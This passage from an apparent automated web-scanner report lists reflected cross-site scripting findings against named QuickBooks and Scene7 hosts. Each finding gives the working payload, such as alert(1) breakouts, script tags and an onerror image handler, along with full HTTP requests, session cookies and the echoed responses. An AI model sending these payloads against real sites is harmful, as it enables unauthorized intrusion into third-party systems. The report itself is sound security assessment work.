x-wily-servlet: Clear appServerIp=10.8.5.152&agentName=app2&servletName=index_jsp&agentHost=esprdatg126&agentProcess=JBoss
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 78963


...[SNIP]...
<script type="text/javascript">
                                       mboxCreate("qb_category_page","categoryId=cat0000000000006343910","categoryName=QB - Home","categoryPageURL=http://quickbooks.intuit.com/index.jsp?34696"-alert(1)-"66a292e8db4=1","priorityCode=0273400000");
                                   </script>
...[SNIP]...

2.42. http://quickbooks.intuit.com/point-of-sale-system/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://quickbooks.intuit.com
Path:	/point-of-sale-system/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c95b7"-alert(1)-"375e47333b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /point-of-sale-system/?c95b7"-alert(1)-"375e47333b2=1 HTTP/1.1
Host: quickbooks.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; Sgmt=default; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; priorityCode=0273400000; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559; propertySegments=1300724501281%7CQB%3A1%3A%3A; SHOPPER_USER_ID=2848631086

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=quickbooks.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=quickbooks.intuit.com; Path=/
x-wily-info: Clear guid=D938AFDF0A08058F1774D40DC20B5D2A
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 64447


...[SNIP]...
<script type="text/javascript">
                                       mboxCreate("qb_category_page","categoryId=cat0000000000006343749","categoryName=","categoryPageURL=http://quickbooks.intuit.com/point-of-sale-system/index.jsp?c95b7"-alert(1)-"375e47333b2=1","priorityCode=0273400000");
                                   </script>
...[SNIP]...

2.43. http://quickbooks.intuit.com/pro/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://quickbooks.intuit.com
Path:	/pro/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48c14"-alert(1)-"b51b21869cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pro/?48c14"-alert(1)-"b51b21869cc=1 HTTP/1.1
Host: quickbooks.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; Sgmt=default; propertySegments=1300724387448%7CQB%3A1%3A%3A; mbox=check#true#1300724446|session#1300724385027-792520#1300726246|PC#1300724385027-792520.17#1303316389; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; SHOPPER_USER_ID=2848631086; priorityCode=0273400000

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:29 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:30 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=quickbooks.intuit.com; Path=/
x-wily-info: Clear guid=D9389D6A0A08058F1774D40D9BA1A6A4
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 78187


...[SNIP]...
<script type="text/javascript">
                                       mboxCreate("qb_category_page","categoryId=cat0000000000006343907","categoryName=","categoryPageURL=http://quickbooks.intuit.com/pro/index.jsp?48c14"-alert(1)-"b51b21869cc=1","priorityCode=0273400000");
                                   </script>
...[SNIP]...

2.44. http://quickbooks.intuit.com/product/add-ons/checks-forms-and-supplies/computer-payroll-sofware.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://quickbooks.intuit.com
Path:	/product/add-ons/checks-forms-and-supplies/computer-payroll-sofware.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb96d"-alert(1)-"cd6903a4e7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /product/add-ons/checks-forms-and-supplies/computer-payroll-sofware.jsp?eb96d"-alert(1)-"cd6903a4e7f=1 HTTP/1.1
Host: quickbooks.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; Sgmt=default; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; propertySegments=1300724501281%7CQB%3A1%3A%3A; SHOPPER_USER_ID=2848631086; priorityCode=0273400000; mbox=session#1300724385027-792520#1300726364|PC#1300724385027-792520.17#1303316504|check#true#1300724564

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:40 GMT; Path=/
Set-Cookie: priorityCode=4899600000; Domain=quickbooks.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=quickbooks.intuit.com; Path=/
x-wily-info: Clear guid=D938C3520A08058F1774D40DFC49021E
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=computer_002dpayroll_002dsofware_jsp&agentHost=esprdatg119&agentProcess=JBoss
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 58367


...[SNIP]...
       mboxCreate("qb_category_page","categoryId=cat0000000000006343771","categoryName=","categoryPageURL=http://quickbooks.intuit.com/product/add-ons/checks-forms-and-supplies/computer-payroll-sofware.jsp?eb96d"-alert(1)-"cd6903a4e7f=1","priorityCode=4899600000");
                                   </script>
...[SNIP]...

2.45. http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://quickbooksonline.intuit.com
Path:	/bookkeeping-accounting-systems/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 40259--><script>alert(1)</script>b00d14c1890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /bookkeeping-accounting-systems/?sc=QBC-V51-SUF-HMEPGE&40259--><script>alert(1)</script>b00d14c1890=1 HTTP/1.1
Host: quickbooksonline.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; SHOPPER_USER_ID=2848631086; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:37 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:38 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=qbo.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=qbo.intuit.com; Path=/
x-wily-info: Clear guid=D938BB4B0A08058F1774D40D4B6DB7C9
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 71107

...[SNIP]...
<iframe height="1" width="1" frameborder="0" src="http://quickbooksonline.intuit.com/qbo/common/global/sem.jsp?sc=QBC-V51-SUF-HMEPGE&40259--><script>alert(1)</script>b00d14c1890=1">
...[SNIP]...

2.46. http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://quickbooksonline.intuit.com
Path:	/bookkeeping-accounting-systems/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20072"-alert(1)-"aeb7d865c5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookkeeping-accounting-systems/?sc=QBC-V51-SUF-HMEPGE&20072"-alert(1)-"aeb7d865c5e=1 HTTP/1.1
Host: quickbooksonline.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; SHOPPER_USER_ID=2848631086; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=qbo.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=qbo.intuit.com; Path=/
x-wily-info: Clear guid=D938AD160A08058F1774D40D345F2BCC
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 71075


...[SNIP]...
           mboxCreate("qbo_category_page","categoryId=cat0000000000006342772","categoryName=","categoryPageURL=http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/index.jsp?sc=QBC-V51-SUF-HMEPGE&20072"-alert(1)-"aeb7d865c5e=1","priorityCode=0273400000");
                       </script>
...[SNIP]...

2.47. http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [sc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://quickbooksonline.intuit.com
Path:	/bookkeeping-accounting-systems/

Issue detail

The value of the sc request parameter is copied into an HTML comment. The payload 52b5a--><script>alert(1)</script>90f5df3971e was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /bookkeeping-accounting-systems/?sc=QBC-V51-SUF-HMEPGE52b5a--><script>alert(1)</script>90f5df3971e HTTP/1.1
Host: quickbooksonline.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; SHOPPER_USER_ID=2848631086; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:32 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:33 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=qbo.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=qbo.intuit.com; Path=/
x-wily-info: Clear guid=D938A80D0A08058F1774D40DA9873EB3
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 71145

...[SNIP]...
<iframe height="1" width="1" frameborder="0" src="http://quickbooksonline.intuit.com/qbo/common/global/sem.jsp?sc=QBC-V51-SUF-HMEPGE52b5a--><script>alert(1)</script>90f5df3971e">
...[SNIP]...

2.48. http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [sc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://quickbooksonline.intuit.com
Path:	/bookkeeping-accounting-systems/

Issue detail

The value of the sc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac3ba"-alert(1)-"5b1d8ff188e was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookkeeping-accounting-systems/?sc=QBC-V51-SUF-HMEPGEac3ba"-alert(1)-"5b1d8ff188e HTTP/1.1
Host: quickbooksonline.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; SHOPPER_USER_ID=2848631086; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:30 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:31 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=qbo.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=qbo.intuit.com; Path=/
x-wily-info: Clear guid=D9389FCA0A08058F1774D40D402E1302
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 71097


...[SNIP]...
               mboxCreate("qbo_category_page","categoryId=cat0000000000006342772","categoryName=","categoryPageURL=http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/index.jsp?sc=QBC-V51-SUF-HMEPGEac3ba"-alert(1)-"5b1d8ff188e","priorityCode=0273400000");
                       </script>
...[SNIP]...

2.49. http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [sc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://quickbooksonline.intuit.com
Path:	/bookkeeping-accounting-systems/

Issue detail

The value of the sc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c45c'%3balert(1)//27fb375d86c was submitted in the sc parameter. This input was echoed as 7c45c';alert(1)//27fb375d86c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookkeeping-accounting-systems/?sc=QBC-V51-SUF-HMEPGE7c45c'%3balert(1)//27fb375d86c HTTP/1.1
Host: quickbooksonline.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; SHOPPER_USER_ID=2848631086; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=qbo.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=qbo.intuit.com; Path=/
x-wily-info: Clear guid=D938A3200A08058F1774D40D1306F974
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 71101


...[SNIP]...
<script type="text/javascript">
                   var cookiePrefixName = 'qbn.';
                   var qboScCookie = 'QBC-V51-SUF-HMEPGE7c45c';alert(1)//27fb375d86c';
                   if (qboScCookie.length >
...[SNIP]...

2.50. http://s7d2.scene7.com/is/image/HPShopping/xx096av_01_10 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d2.scene7.com
Path:	/is/image/HPShopping/xx096av_01_10

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3fdea<img%20src%3da%20onerror%3dalert(1)>702198f0c8b was submitted in the REST URL parameter 4. This input was echoed as 3fdea<img src=a onerror=alert(1)>702198f0c8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/HPShopping/xx096av_01_103fdea<img%20src%3da%20onerror%3dalert(1)>702198f0c8b?layer=comp&bgc=0xffffff&op_sharpen=1&scl=7.89473684210526&id=cs6o50&fmt=swf HTTP/1.1
Host: s7d2.scene7.com
Proxy-Connection: keep-alive
Referer: http://s7d2.scene7.com/skins/HPShopping/SWFs/genericzoom.swf?codeRoot=/is-viewers-3.7/flash&serverUrl=http://s7d2.scene7.com/is/image/&image=HPShopping/xx096av_is&skin=http://s7d2.scene7.com/skins/HPShopping/SWFs/embededHEW.swf&config=HPShopping/embedded_config&instanceName=_1300722656419&swatchRatio=2&swatchModifier=op_sharpen%3d1&initialVal=&productDemo=http://h71016.www7.hp.com/html/interactive/PavilionEliteHPE/model.html?buyNowLink=noshow%26quickspecs=default%26jumpid=re_r329_3d/DSK/PavilionEliteHPE/ProdPage/flash/CSMR/NonIDP&activeList=&.ext=.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 21 Mar 2011 15:50:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 21 Mar 2011 15:50:40 GMT
Connection: close
X-N: S

Unable to find /HPShopping/xx096av_01_103fdea<img src=a onerror=alert(1)>702198f0c8b

2.51. http://s7d2.scene7.com/is/image/HPShopping/xx096av_03_10 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d2.scene7.com
Path:	/is/image/HPShopping/xx096av_03_10

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b1bf3<img%20src%3da%20onerror%3dalert(1)>342e8add5e7 was submitted in the REST URL parameter 4. This input was echoed as b1bf3<img src=a onerror=alert(1)>342e8add5e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/HPShopping/xx096av_03_10b1bf3<img%20src%3da%20onerror%3dalert(1)>342e8add5e7?layer=comp&op_sharpen=1&req=tmb&wid=42&hei=42&wid=84&hei=84&fmt=swf HTTP/1.1
Host: s7d2.scene7.com
Proxy-Connection: keep-alive
